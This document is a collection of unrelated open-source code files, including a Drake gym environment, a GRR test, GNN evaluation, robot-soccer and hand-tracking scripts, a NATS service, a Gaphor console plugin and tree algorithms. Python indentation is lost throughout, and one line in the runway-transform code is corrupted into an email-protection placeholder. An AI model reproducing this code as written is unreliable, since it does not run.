controller_vis = MeshcatVisualizerCpp.AddToBuilder(
builder, controller_scene_graph, meshcat,
MeshcatVisualizerParams(prefix="controller"))
controller_vis.set_name("controller meshcat")
controller_plant.Finalize()
# Stiffness control. (For a point finger with unit mass, the
# InverseDynamicsController is identical)
N = controller_plant.num_positions()
kp = [100] * N
ki = [1] * N
kd = [2 * np.sqrt(kp[0])] * N
controller = builder.AddSystem(
InverseDynamicsController(controller_plant, kp, ki, kd, False))
builder.Connect(plant.get_state_output_port(finger),
controller.get_input_port_estimated_state())
actions = builder.AddSystem(PassThrough(N))
positions_to_state = builder.AddSystem(Multiplexer([N, N]))
builder.Connect(actions.get_output_port(),
positions_to_state.get_input_port(0))
zeros = builder.AddSystem(ConstantVectorSource([0] * N))
builder.Connect(zeros.get_output_port(),
positions_to_state.get_input_port(1))
builder.Connect(positions_to_state.get_output_port(),
controller.get_input_port_desired_state())
builder.Connect(controller.get_output_port(),
plant.get_actuation_input_port())
if meshcat:
positions_to_poses = builder.AddSystem(
MultibodyPositionToGeometryPose(controller_plant))
builder.Connect(
positions_to_poses.get_output_port(),
controller_scene_graph.get_source_pose_port(
controller_plant.get_source_id()))
builder.ExportInput(actions.get_input_port(), "actions")
if observations == "state":
builder.ExportOutput(plant.get_state_output_port(), "observations")
# TODO(russt): Add 'time', and 'keypoints'
else:
raise ValueError("observations must be one of ['state']")
class RewardSystem(LeafSystem):
def __init__(self):
LeafSystem.__init__(self)
self.DeclareVectorInputPort("box_state", 6)
self.DeclareVectorInputPort("finger_state", 4)
self.DeclareVectorInputPort("actions", 2)
self.DeclareVectorOutputPort("reward", 1, self.CalcReward)
def CalcReward(self, context, output):
box_state = self.get_input_port(0).Eval(context)
finger_state = self.get_input_port(1).Eval(context)
actions = self.get_input_port(2).Eval(context)
angle_from_vertical = (box_state[2] % np.pi) - np.pi / 2
cost = 2 * angle_from_vertical**2 # box angle
cost += 0.1 * box_state[5]**2 # box velocity
effort = actions - finger_state[:2]
cost += 0.1 * effort.dot(effort) # effort
# finger velocity
cost += 0.1 * finger_state[2:].dot(finger_state[2:])
# Add 10 to make rewards positive (to avoid rewarding simulator
# crashes).
output[0] = 10 - cost
reward = builder.AddSystem(RewardSystem())
builder.Connect(plant.get_state_output_port(box), reward.get_input_port(0))
builder.Connect(plant.get_state_output_port(finger),
reward.get_input_port(1))
builder.Connect(actions.get_output_port(), reward.get_input_port(2))
builder.ExportOutput(reward.get_output_port(), "reward")
# Set random state distributions.
uniform_random = Variable(name="uniform_random",
type=Variable.Type.RANDOM_UNIFORM)
box_joint = plant.GetJointByName("box")
x, y = box_joint.get_default_translation()
box_joint.set_random_pose_distribution([.2 * uniform_random - .1 + x, y], 0)
diagram = builder.Build()
simulator = Simulator(diagram)
# Termination conditions:
def monitor(context):
if context.get_time() > time_limit:
return EventStatus.ReachedTermination(diagram, "time limit")
return EventStatus.Succeeded()
simulator.set_monitor(monitor)
return simulator
def BoxFlipUpEnv(observations="state", meshcat=None, time_limit=10):
simulator = make_box_flipup(RandomGenerator(),
observations,
meshcat=meshcat,
time_limit=time_limit)
action_space = gym.spaces.Box(low=np.array([-.5, -0.1], dtype="float32"),
high=np.array([.5, 0.6], dtype="float32"))
plant = simulator.get_system().GetSubsystemByName("plant")
if observations == "state":
low = np.concatenate(
(plant.GetPositionLowerLimits(), plant.GetVelocityLowerLimits()))
high = np.concatenate(
(plant.GetPositionUpperLimits(), plant.GetVelocityUpperLimits()))
observation_space = gym.spaces.Box(low=np.asarray(low, dtype="float32"),
high=np.asarray(high,
dtype="float32"))
env = DrakeGymEnv(simulator=simulator,
time_step=0.1,
action_space=action_space,
observation_space=observation_space,
reward="reward",
action_port_id="actions",
observation_port_id="observations")
return env
|
the-stack_106_13060
|
#!/usr/bin/env python
"""Tests for grr.server.flows.general.filetypes."""
import os
from grr_response_client.client_actions import plist
from grr.lib import flags
from grr.lib.rdfvalues import paths as rdf_paths
from grr.lib.rdfvalues import plist as rdf_plist
from grr.server import flow
from grr.server.flows.general import filetypes
from grr.test_lib import action_mocks
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class TestPlistFlows(flow_test_lib.FlowTestsBaseclass):
"""Tests the PlistValueFilter flow."""
def _RunFlow(self, flow_name, context=None, query=None):
client_mock = action_mocks.ActionMock(plist.PlistQuery)
request = rdf_plist.PlistRequest(context=context, query=query)
request.pathspec.path = os.path.join(self.base_path, "test.plist")
request.pathspec.pathtype = rdf_paths.PathSpec.PathType.OS
for s in flow_test_lib.TestFlowHelper(
flow_name,
client_mock,
client_id=test_lib.TEST_CLIENT_ID,
token=self.token,
request=request):
session_id = s
return session_id
def _CheckOutput(self, session_id):
results = flow.GRRFlow.ResultCollectionForFID(session_id)
self.assertEqual(len(results), 1)
self.assertEqual(results[0]["nested1"]["nested11"]["key112"], "value112")
def testPlistValueFilter(self):
session_id = self._RunFlow(
filetypes.PlistValueFilter.__name__, context="", query="")
self._CheckOutput(session_id)
def main(argv):
# Run the full test suite
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
the-stack_106_13062
|
import argparse
from tqdm import tqdm
import sys
from sklearn.metrics import f1_score
from pyHGT.data import *
from pyHGT.model import *
from warnings import filterwarnings
filterwarnings("ignore")
import torch
import torch.nn.functional as F
from torch.nn import ModuleList, Linear, ParameterDict, Parameter
from torch_geometric.utils import to_undirected
from torch_geometric.data import Data
from torch_geometric.nn import MessagePassing
from ogb.nodeproppred import PygNodePropPredDataset, Evaluator
parser = argparse.ArgumentParser(description='Training GNN on ogbn-mag benchmark')
parser.add_argument('--data_dir', type=str, default='/datadrive/dataset/OGB_MAG.pk',
help='The address of preprocessed graph.')
parser.add_argument('--model_dir', type=str, default='./hgt_4layer',
help='The address for storing the trained models.')
parser.add_argument('--task_type', type=str, default='variance_reduce',
help='Whether to use variance_reduce evaluation or sequential evaluation')
parser.add_argument('--vr_num', type=int, default=8,
help='Whether to use ensemble evaluation or sequential evaluation')
parser.add_argument('--n_pool', type=int, default=8,
help='Number of process to sample subgraph')
parser.add_argument('--n_batch', type=int, default=32,
help='Number of batch (sampled graphs) for each epoch')
parser.add_argument('--batch_size', type=int, default=128,
help='Number of output nodes for training')
parser.add_argument('--conv_name', type=str, default='hgt',
choices=['hgt', 'gcn', 'gat', 'rgcn', 'han', 'hetgnn'],
help='The name of GNN filter. By default is Heterogeneous Graph Transformer (hgt)')
parser.add_argument('--n_hid', type=int, default=512,
help='Number of hidden dimension')
parser.add_argument('--n_heads', type=int, default=8,
help='Number of attention head')
parser.add_argument('--n_layers', type=int, default=4,
help='Number of GNN layers')
parser.add_argument('--cuda', type=int, default=2,
help='cuda')
parser.add_argument('--dropout', type=float, default=0.2,
help='Dropout ratio')
parser.add_argument('--sample_depth', type=int, default=6,
help='How many numbers to sample the graph')
parser.add_argument('--sample_width', type=int, default=520,
help='How many nodes to be sampled per layer per type')
parser.add_argument('--prev_norm', help='Whether to add layer-norm on the previous layers', action='store_true')
parser.add_argument('--last_norm', help='Whether to add layer-norm on the last layers', action='store_true')
parser.add_argument('--use_RTE', help='Whether to use RTE', action='store_true')
args = parser.parse_args()
args_print(args)
def ogbn_sample(seed, samp_nodes):
np.random.seed(seed)
ylabel = torch.LongTensor(graph.y[samp_nodes])
feature, times, edge_list, indxs, _ = sample_subgraph(graph, \
inp = {'paper': np.concatenate([samp_nodes, graph.years[samp_nodes]]).reshape(2, -1).transpose()}, \
sampled_depth = args.sample_depth, sampled_number = args.sample_width, \
feature_extractor = feature_MAG)
node_feature, node_type, edge_time, edge_index, edge_type, node_dict, edge_dict = \
to_torch(feature, times, edge_list, graph)
train_mask = graph.train_mask[indxs['paper']]
valid_mask = graph.valid_mask[indxs['paper']]
test_mask = graph.test_mask[indxs['paper']]
ylabel = graph.y[indxs['paper']]
yindxs = indxs['paper'][test_mask]
return node_feature, node_type, edge_time, edge_index, edge_type, (train_mask, valid_mask, test_mask), ylabel, yindxs
def prepare_data(pool, task_type = 'train', s_idx = 0, n_batch = args.n_batch, batch_size = args.batch_size):
'''
Sampled and prepare training and validation data using multi-process parallization.
'''
jobs = []
if task_type == 'train':
for batch_id in np.arange(n_batch):
p = pool.apply_async(ogbn_sample, args=([randint(), \
np.random.choice(graph.train_paper, args.batch_size, replace = False)]))
jobs.append(p)
elif task_type == 'variance_reduce':
target_papers = graph.test_paper[s_idx * args.batch_size : (s_idx + 1) * args.batch_size]
for batch_id in np.arange(n_batch):
p = pool.apply_async(ogbn_sample, args=([randint(), target_papers]))
jobs.append(p)
elif task_type == 'sequential':
for i in np.arange(n_batch):
target_papers = graph.test_paper[(s_idx + i) * batch_size : (s_idx + i + 1) * batch_size]
p = pool.apply_async(ogbn_sample, args=([randint(), target_papers]))
jobs.append(p)
return jobs
graph = dill.load(open(args.data_dir, 'rb'))
np.random.seed(43)
np.random.shuffle(graph.test_paper)
y_preds = {pi : np.zeros(graph.y.max().item()+1) for pi in graph.test_paper}
evaluator = Evaluator(name='ogbn-mag')
device = torch.device("cuda:%d" % args.cuda)
gnn = GNN(conv_name = args.conv_name, in_dim = len(graph.node_feature['paper'][0]), \
n_hid = args.n_hid, n_heads = args.n_heads, n_layers = args.n_layers, dropout = args.dropout,\
num_types = len(graph.get_types()), num_relations = len(graph.get_meta_graph()) + 1,\
prev_norm = args.prev_norm, last_norm = args.last_norm, use_RTE = args.use_RTE)
classifier = Classifier(args.n_hid, graph.y.max().item()+1)
model = nn.Sequential(gnn, classifier)
model.load_state_dict(torch.load(args.model_dir))
model.to(device)
print('Model #Params: %d' % get_n_params(model))
criterion = nn.NLLLoss()
model.eval()
with torch.no_grad():
if args.task_type == 'variance_reduce':
y_pred = []
y_true = []
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'variance_reduce', s_idx = 0, n_batch = args.vr_num)
with tqdm(np.arange(len(graph.test_paper) // args.batch_size + 1) + 1, desc='eval') as monitor:
for s_idx in monitor:
ress = []
test_data = [job.get() for job in jobs]
pool.close()
pool.join()
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'variance_reduce', s_idx = s_idx, n_batch = args.vr_num)
for node_feature, node_type, edge_time, edge_index, edge_type, (train_mask, valid_mask, test_mask), ylabel, yindxs in test_data:
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
res = classifier.forward(node_rep[:args.batch_size])
ress += [res]
res = classifier.forward(node_rep[:len(ylabel)][test_mask])
for pi, r in zip(yindxs, res.tolist()):
y_preds[pi] += r
y_pred += torch.stack(ress).mean(dim=0).argmax(dim=1).tolist()
y_true += list(ylabel[:args.batch_size])
test_acc = evaluator.eval({
'y_true': torch.LongTensor(y_true).unsqueeze(-1),
'y_pred': torch.LongTensor(y_pred).unsqueeze(-1)
})['acc']
monitor.set_postfix(accuracy = test_acc)
elif args.task_type == 'sequential':
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'sequential', s_idx = 0, n_batch = args.n_batch, batch_size=args.batch_size)
with tqdm(np.arange(len(graph.test_paper) // (args.batch_size * args.n_batch) + 1) + 1, desc='eval') as monitor:
for s_idx in monitor:
test_data = [job.get() for job in jobs]
pool.close()
pool.join()
pool = mp.Pool(args.n_pool)
jobs = prepare_data(pool, task_type = 'sequential', s_idx = int(s_idx * args.n_batch), batch_size=args.batch_size)
for node_feature, node_type, edge_time, edge_index, edge_type, (train_mask, valid_mask, test_mask), ylabel, yindxs in test_data:
node_rep = gnn.forward(node_feature.to(device), node_type.to(device), \
edge_time.to(device), edge_index.to(device), edge_type.to(device))
res = classifier.forward(node_rep[:len(ylabel)][test_mask])
for pi, r in zip(yindxs, res.tolist()):
y_preds[pi] += r
y_pred = []
y_true = []
for pi in y_preds:
y_pred += [y_preds[pi].argmax()]
y_true += [graph.y[pi]]
test_acc = evaluator.eval({
'y_true': torch.LongTensor(y_true).unsqueeze(-1),
'y_pred': torch.LongTensor(y_pred).unsqueeze(-1)
})['acc']
print(test_acc)
|
the-stack_106_13063
|
def extractLotustranslationsWordpressCom(item):
'''
Parser for 'lotustranslations.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
if item['tags'] == ['Announcements']:
return None
tagmap = [
('Xianggong, Please Divorce Me!', 'Xianggong, Please Divorce Me!', 'translated'),
('100% Sweet Love', '100% sweet love: The delinquent XXX wife is a bit sweet', 'translated'),
('Black Bellied President Dotes on Wife', 'Black Bellied President Dotes on Wife', 'translated'),
('icsaytd', 'I Can Still Accompany You Till Dawn', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
the-stack_106_13064
|
# rcj_soccer_player controller - ROBOT Y3
###### REQUIRED in order to import files from Y1 controller
import sys
from pathlib import Path
sys.path.append(str(Path('.').absolute().parent))
# You can now import scripts that you put into the folder with your
# robot B1 controller
from rcj_soccer_player_y1 import rcj_soccer_robot, utils
######
# Feel free to import built-in libraries
import math
class MyRobot(rcj_soccer_robot.RCJSoccerRobot):
def run(self):
while self.robot.step(rcj_soccer_robot.TIME_STEP) != -1:
if self.is_new_data():
data = self.get_new_data()
# Get the position of our robot
robot_pos = data[self.name]
# Get the position of the ball
ball_pos = data['ball']
# Get angle between the robot and the ball
# and between the robot and the north
ball_angle, robot_angle = self.get_angles(ball_pos, robot_pos)
# Compute the speed for motors
direction = utils.get_direction(ball_angle)
# If the robot has the ball right in front of it, go forward,
# rotate otherwise
if direction == 0:
left_speed = -5
right_speed = -5
else:
left_speed = direction * 4
right_speed = direction * -4
# Set the speed to motors
self.left_motor.setVelocity(left_speed)
self.right_motor.setVelocity(right_speed)
my_robot = MyRobot()
my_robot.run()
|
the-stack_106_13065
|
from geographiclib.geodesic import Geodesic
import datetime
import numpy as np
import math
from ast import literal_eval
def get_date_time(row):
##Get datetime object
date = [int(i) for i in literal_eval(row["Date"])]
time = [int(math.floor(float(l))) for l in literal_eval(row["Time"])]
t = datetime.datetime(date[0],date[1],date[2],time[0],time[1],time[2])
return t
def get_range_and_bearing(lat1,lon1,lat2,lon2):
##Get relative range and bearing between two lat/lon points
geod = Geodesic.WGS84
lat2 = float(lat2)
lon2 = float(lon2)
g = geod.Inverse(lat1,lon1,lat2,lon2)
return g['s12']/1000.0, g['azi1']
def get_runway_transform():
##Numbers are hardcoded to KBTP
R1 = [40.774548, -79.959237] ##Runway 08
R2 = [40.778630, -79.942803] ##Runway 26
cam_ref = [ 40.777888, -79.949864] ##setup location
runway_length = 1.45
r1, b1 = get_range_and_bearing(cam_ref[0],cam_ref[1],R1[0],R1[1])
x1 = r1*np.sin(np.deg2rad(b1))
y1 = r1*np.cos(np.deg2rad(b1))
# print(x1,y1)
r2, b2 = get_range_and_bearing(cam_ref[0],cam_ref[1],R2[0],R2[1])
x2 = r2*np.sin(np.deg2rad(b2))
y2 = r2*np.cos(np.deg2rad(b2))
# print(x2,y2)
ang = -np.arctan2(y1-y2,x1-x2)
rot = np.array([[np.cos(ang),-np.sin(ang)],[np.sin(ang),np.cos(ang)]])
p = [email protected]([x1,y1])
# print(p)
R = -np.array([[np.cos(ang),-np.sin(ang), p[0]],[np.sin(ang),np.cos(ang),p[1]],[0,0,1]])
return R
def convert_frame(r,b,R):
x = np.multiply(r,np.sin(np.deg2rad(b)))
y = np.multiply(r,np.cos(np.deg2rad(b)))
points = np.matmul(R,np.vstack((x,y,np.ones((np.shape(x))))))
return points[0],points[1]
def feet2kmeter(value):
return float(value)*0.3048/1000.0
if __name__ == '__main__':
R1 = [40.778208, -79.968666]
# R1 = [ 40.777888, -79.949864]
cam_ref = [ 40.777888, -79.949864]
r1, b1 = get_range_and_bearing(cam_ref[0],cam_ref[1],R1[0],R1[1])
R = get_runway_transform()
print(convert_frame(r1,b1,R))
|
the-stack_106_13066
|
from socket import AF_INET, SOCK_STREAM, socket, SOL_SOCKET, SO_REUSEADDR
#from threading import Thread
from multiprocessing import Process
def echo_server(address):
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, True)
sock.bind(address)
sock.listen(1)
while True:
client, addr = sock.accept()
#echo_handler(client, addr)
#Thread(target=echo_handler, args=(client, addr)).start()
Process(target=echo_handler, args=(client, addr)).start()
def echo_handler(client, addr):
print("Connection from", addr)
while client:
while True:
data = client.recv(100_000)
if not data:
break
client.sendall(data)
print("Connection closed")
echo_server(('', 25000))
|
the-stack_106_13067
|
_base_ = [
'../_base_/models/retinanet_r50_fpn.py',
'../_base_/datasets/coco_detection.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
backbone=dict(
frozen_stages=-1,
norm_cfg=dict(type='SyncBN', requires_grad=True)),
neck=dict(
norm_cfg=dict(type='SyncBN', requires_grad=True)),
bbox_head=dict(
norm_cfg=dict(type='SyncBN', requires_grad=True))
)
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
|
the-stack_106_13068
|
#
# @author:charlotte.Song
# @file: yolact_neck.py
# @Date: 2019/9/17 11:53
# @description:
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import xavier_init
from mmdet.core import auto_fp16
from ..registry import NECKS
from ..utils import ConvModule
@NECKS.register_module
class YolactFPNPlus(nn.Module):
"""a FPN-like structure, produces proto map
and feature maps at the same time.
"""
def __init__(self,
in_channels,
in_embeds,
out_channels,
num_outs,
stacked_convs=3,
upsample_ratio=2,
start_level=0,
end_level=-1,
add_extra_convs=False,
extra_convs_on_inputs=True,
relu_before_extra_convs=False,
no_norm_on_lateral=False,
conv_cfg=None,
norm_cfg=None,
activation=None):
super(YolactFPNPlus, self).__init__()
assert isinstance(in_channels, list)
self.in_channels = in_channels
self.in_embeds = in_embeds
self.out_channels = out_channels
self.num_ins = len(in_channels)
self.num_outs = num_outs
self.stacked_convs = stacked_convs
self.upsample_ratio = upsample_ratio
self.activation = activation
self.relu_before_extra_convs = relu_before_extra_convs
self.no_norm_on_lateral = no_norm_on_lateral
self.fp16_enabled = False
if end_level == -1:
self.backbone_end_level = self.num_ins
assert num_outs >= self.num_ins - start_level
else:
# if end_level < inputs, no extra level is allowed
self.backbone_end_level = end_level
assert end_level <= len(in_channels)
assert num_outs == end_level - start_level
self.start_level = start_level
self.end_level = end_level
self.add_extra_convs = add_extra_convs
self.extra_convs_on_inputs = extra_convs_on_inputs
self.lateral_convs = nn.ModuleList()
self.fpn_convs = nn.ModuleList()
for i in range(self.start_level, self.backbone_end_level):
l_conv = ConvModule(
in_channels[i],
out_channels,
1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg if not self.no_norm_on_lateral else None,
activation=self.activation,
inplace=False)
fpn_conv = ConvModule(
out_channels,
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
self.lateral_convs.append(l_conv)
self.fpn_convs.append(fpn_conv)
# add convs for proto masks.
self.proto_convs = nn.ModuleList()
for i in range(self.stacked_convs):
self.proto_convs.append(
ConvModule(
out_channels,
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False))
self.smooth_conv = ConvModule(
in_channels[0],
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
self.proto_smooth_conv = ConvModule(
out_channels,
out_channels,
3,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
# add extra conv layers (e.g., RetinaNet)
extra_levels = num_outs - self.backbone_end_level + self.start_level
if add_extra_convs and extra_levels >= 1:
for i in range(extra_levels):
if i == 0 and self.extra_convs_on_inputs:
in_channels = self.in_channels[self.backbone_end_level - 1]
else:
in_channels = out_channels
extra_fpn_conv = ConvModule(
in_channels,
out_channels,
3,
stride=2,
padding=1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
activation=self.activation,
inplace=False)
self.fpn_convs.append(extra_fpn_conv)
self.proto_up = nn.Upsample(
scale_factor=self.upsample_ratio, mode='bilinear')
self.proto_logits = nn.Conv2d(out_channels, self.in_embeds, 1)
self.relu = nn.ReLU(inplace=True)
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
xavier_init(m, distribution='uniform')
@auto_fp16()
def forward(self, inputs):
assert len(inputs) == len(self.in_channels)
# build laterals
laterals = [
lateral_conv(inputs[i + self.start_level])
for i, lateral_conv in enumerate(self.lateral_convs)
]
# build top-down path
used_backbone_levels = len(laterals)
for i in range(used_backbone_levels - 1, 0, -1):
laterals[i - 1] += F.interpolate(
laterals[i], scale_factor=2, mode='nearest')
# build outputs
# part 1: from original levels
outs = [
self.fpn_convs[i](laterals[i]) for i in range(used_backbone_levels)
]
# part 2: add extra levels
if self.num_outs > len(outs):
# use max pool to get more levels on top of outputs
# (e.g., Faster R-CNN, Mask R-CNN)
if not self.add_extra_convs:
for i in range(self.num_outs - used_backbone_levels):
outs.append(F.max_pool2d(outs[-1], 1, stride=2))
# add conv layers on top of original feature maps (RetinaNet)
else:
if self.extra_convs_on_inputs:
orig = inputs[self.backbone_end_level - 1]
outs.append(self.fpn_convs[used_backbone_levels](orig))
else:
outs.append(self.fpn_convs[used_backbone_levels](outs[-1]))
for i in range(used_backbone_levels + 1, self.num_outs):
if self.relu_before_extra_convs:
outs.append(self.fpn_convs[i](F.relu(outs[-1])))
else:
outs.append(self.fpn_convs[i](outs[-1]))
# produce proto_masks.
proto_feat = outs[0].clone()
for proto_conv in self.proto_convs:
proto_feat = proto_conv(proto_feat)
proto_feat = self.proto_up(proto_feat)
proto_lateral = inputs[0].clone()
proto_lateral = self.smooth_conv(proto_lateral)
proto_feat = proto_lateral + proto_feat
proto_feat = self.proto_smooth_conv(proto_feat)
proto_mask = self.proto_logits(proto_feat)
proto_mask = self.relu(proto_mask)
return proto_mask, tuple(outs)
|
the-stack_106_13069
|
import cv2
import handTrackingModule as htm
import time
cam = cv2.VideoCapture(0)
########
widthimg = 1280
heightimg = 1280
#######
cam.set(3,widthimg)
cam.set(4,heightimg)
#########
########
ctime = 0
ptime = 0
#####
detector = htm.handDetector()
########
options = ['Face', 'Hands', 'UpperB' , 'LowerB','Stop']
big_box_height = 85
hi_box = 30
hf_box = 75
box_width = 150
start_points = []
end_points =[]
point = 0
end_point = 0
for i in range(5) :
if i == 0 :
point = 10
end_point = point + box_width
else:
point = end_points[i-1] + 20
end_point = point + box_width
start_points.append(point)
end_points.append(end_point)
#########
def add_options(img , widthimg, heightimg) :
cv2.rectangle(img,(0,0),(widthimg,big_box_height),(255,255,255) , cv2.FILLED)
cv2.putText(img,"Make Invisible: ",(5,15),cv2.FONT_HERSHEY_COMPLEX_SMALL,1,(255,0,0),2)
for i in range(len(options)) :
if i==len(options)-1 :
point = widthimg-160
cv2.rectangle(img, (point, hi_box), (point+150, hf_box), (200, 200, 200), cv2.FILLED)
cv2.putText(img, options[i], (point + 25, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 50, 250), 2)
else:
cv2.rectangle(img,(start_points[i],hi_box),(end_points[i],hf_box),(200,200,200),cv2.FILLED)
cv2.putText(img,options[i],(start_points[i]+25,60),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,150,250),2)
#cv2.rectangle(img,(start_points[1],hi_box),(end_points[1],hf_box),(200,200,200),cv2.FILLED)
#cv2.putText(img, 'Face', (45, 70), cv2.FONT_HERSHEY_SIMPLEX, 1, (150, 0, 0), 2)
while True:
res, frame = cam.read()
frame = cv2.flip(frame, 1)
img = detector.findHands(frame)
add_options(frame, widthimg, heightimg)
lmslist = detector.findPosition(img)
#print(lmslist)
# --FpS--
ctime = time.time()
fps = 1 // (ctime - ptime)
ptime = ctime
cv2.putText(frame, str(int(fps)), (frame.shape[1] - 100, frame.shape[0] - 25), cv2.FONT_HERSHEY_TRIPLEX, 2,
(0, 255, 0), 2)
cv2.imshow('Hand Tracker', img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cam.release()
cv2.destroyAllWindows()
|
the-stack_106_13070
|
import os
import signal
import asyncio
from nats.aio.client import Client as Nats
import edgefarm_application as ef
from edgefarm_application.base.avro import schemaless_decode
from edgefarm_application.base.schema import schema_load_builtin
from edgefarm_application.base.avro import schemaless_encode
nc = None
nats_topic = "pis.seatRes"
async def nats_handler(msg):
"""Receive nats messages here."""
# Decode received message
seat_info_request = schemaless_decode(
msg.data, schema_load_builtin(__file__, "../schemas/seat_info_request")
)
train = seat_info_request["train"]
print("Train ID: " + train)
# Prepare seat info data
seat_info_response = {
"seatReservations": [
{"id": 0, "startStation": "Nürnberg", "endStation": "München"},
{"id": 2, "startStation": "Erlangen", "endStation": "Frankf."},
{"id": 5, "startStation": "Köln", "endStation": "Berlin"},
]
}
print("Seat Info: " + str(seat_info_response))
resp_byte = schemaless_encode(
seat_info_response,
schema_load_builtin(__file__, "../schemas/seat_info_response"),
)
# Reply seat info data
await nc.publish(msg.reply, resp_byte)
async def main():
global nc
loop = asyncio.get_event_loop()
# Initialize EdgeFarm SDK
await ef.application_module_init(loop, "", "", "")
#
# Connect to NATS and subscribe to "service.location" subject
#
nc = Nats()
nats_server = os.getenv("NATS_SERVER", "nats:4222")
await nc.connect(servers="nats://" + nats_server, loop=loop)
print("NATS connect ok")
subscription_id = await nc.subscribe(nats_topic, cb=nats_handler)
#
# The following shuts down gracefully when SIGINT or SIGTERM is received
#
stop = {"stop": False}
def signal_handler():
stop["stop"] = True
for sig in ("SIGINT", "SIGTERM"):
loop.add_signal_handler(getattr(signal, sig), signal_handler)
while not stop["stop"]:
await asyncio.sleep(1)
print("Unsubscribing and shutting down...")
await nc.unsubscribe(subscription_id)
await nc.close()
await ef.application_module_term()
if __name__ == "__main__":
asyncio.run(main())
|
the-stack_106_13071
|
#!/usr/bin/env python
import logging
import os
from gi.repository import Gdk, Gtk
from gaphor.abc import ActionProvider
from gaphor.action import action
from gaphor.plugins.console.console import GTKInterpreterConsole
from gaphor.services.properties import get_config_dir
from gaphor.ui.abc import UIComponent
log = logging.getLogger(__name__)
class ConsoleWindow(UIComponent, ActionProvider):
title = "Gaphor Console"
size = (400, 400)
def __init__(self, component_registry, main_window, tools_menu):
self.component_registry = component_registry
self.main_window = main_window
tools_menu.add_actions(self)
self.window = None
def load_console_py(self, console):
"""Load default script for console.
Saves some repetitive typing.
"""
console_py = os.path.join(get_config_dir(), "console.py")
try:
with open(console_py) as f:
for line in f:
console.push(line)
except OSError:
log.info(f"No initiation script {console_py}")
@action(name="console-window-open", label="_Console")
def open_console(self):
if not self.window:
self.open()
else:
self.window.set_property("has-focus", True)
def open(self):
console = self.construct()
self.load_console_py(console)
def close(self, widget=None):
if self.window:
self.window.destroy()
self.window = None
def construct(self):
window = Gtk.Window.new(Gtk.WindowType.TOPLEVEL)
window.set_transient_for(self.main_window.window)
window.set_title(self.title)
console = GTKInterpreterConsole(
locals={"service": self.component_registry.get_service}
)
console.show()
window.add(console)
window.show()
self.window = window
def key_event(widget, event):
if (
event.keyval == Gdk.KEY_d
and event.get_state() & Gdk.ModifierType.CONTROL_MASK
):
window.destroy()
return False
window.connect("key_press_event", key_event)
window.connect("destroy", self.close)
return console
|
the-stack_106_13072
|
from Tree.BinaryTree.BinaryTree import BinaryTree, BinaryTreeNode
from Utils.Array import input_array
"""
LeetCode : https://leetcode.com/problems/diameter-of-binary-tree/
GFG: https://www.geeksforgeeks.org/diameter-of-a-binary-tree/
"""
diameter = 0
def find_depth(root: BinaryTreeNode) -> int:
if root is None:
return 0
left_depth = find_depth(root.left)
right_depth = find_depth(root.right)
return max(left_depth, right_depth) + 1 # maximum_depth
def diameter_of_binary_tree(root: BinaryTreeNode) -> int:
if root is None:
return 0
left_child_diameter = diameter_of_binary_tree(root.left)
right_child_diameter = diameter_of_binary_tree(root.right)
# current node's diameter
left_depth = find_depth(root.left)
right_depth = find_depth(root.right)
curr_node_diameter = left_depth + right_depth
return max(curr_node_diameter, left_child_diameter, right_child_diameter)
if __name__ == '__main__':
tree_input = input_array(prompt="")
root = BinaryTree.single_line_input(tree_input)
BinaryTree.display(root)
print("diameter : ", diameter_of_binary_tree(root))
"""
1
/ \
2 3
/ \
4 5
1 2 3 4 5 -1 -1 -1 -1 -1 -1
"""
"""
0
/ \
1 2
/ \
3 4
/ \
5 6
\
7
0 1 2 3 4 -1 -1 5 -1 -1 6 -1 -1 -1 7 -1 -1
"""
|
the-stack_106_13073
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model for classifier."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
import time
import logging
import numpy as np
from scipy.stats import pearsonr, spearmanr
from six.moves import xrange
import paddle.fluid as fluid
from ernie.classification.model.ernie import ErnieModel
log = logging.getLogger(__name__)
def create_model(args,
pyreader_name,
ernie_config,
is_prediction=False,
task_name="",
is_classify=False,
is_regression=False,
ernie_version="1.0"):
